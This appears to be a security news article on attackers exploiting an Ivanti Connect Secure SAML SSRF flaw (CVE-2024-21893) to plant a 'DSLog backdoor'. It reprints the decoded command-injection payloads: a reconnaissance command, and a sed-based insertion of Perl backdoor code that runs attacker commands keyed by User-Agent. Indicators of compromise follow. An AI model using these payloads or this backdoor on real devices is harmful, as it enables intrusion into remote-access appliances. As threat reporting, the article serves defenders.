Ivanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High).
In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.
Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks
.
Hackers Exploiting Ivanti SSRF Flaw
According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.
Initial request
During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.
Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.
http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname – a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash; |
This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.
Backdoor Installation
Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:
http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw / DESTFILE=”/home/perl/DSLog.pm” CLFILE=”/home/perl/DSLogMB.pm” if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then echo ‘OK’; else sed -i ‘102i\ my $ua = $ENV{HTTP_USER_AGENT};n my $req = $ENV{QUERY_STRING};n my $qur = ”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7”;n my @param = split(/&/, $req);n if (index($ua, $qur) != -1) {n if ($param[1]){n my @res = split(/=/, $param[1]);n if ($res[0] eq ”cdi”){n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;n $res[1] =~ tr/!-~/P-~!-O/;n system(${res[1]});n }n }n }’ $DESTFILE fi /bin/touch -r $CLFILE $DESTFILE rm -rf /var/cores/* /home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d | /bin/bash; |
This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.
Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.
Indicators of Compromise
Host-based IoC
Path + filename | Hash | Description |
/root/home/perl/DSLog[.]pm | N/A – varies | Legitimate DSLog Log module embedding the |
/root/home/webserver/htdocs/danana/imgs/index[.]txt | N/A – varies | backdoor |
/root/home/webserver/htdocs/danana/imgs/index1[.]txt | N/A – varies | Some seem to be random characters. |
/root/home/webserver/htdocs/danana/imgs/index2[.]txt | N/A – varies | Some seem to be random characters. |
/root/home/webserver/htdocs/danana/imgs/logo[.]png | Embedding the result of ‘uname -a’ |
Network-based IoC
Network Indicator | Type | Description |
159.65.123.122 | IP Address | Massive exploitation activity |
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.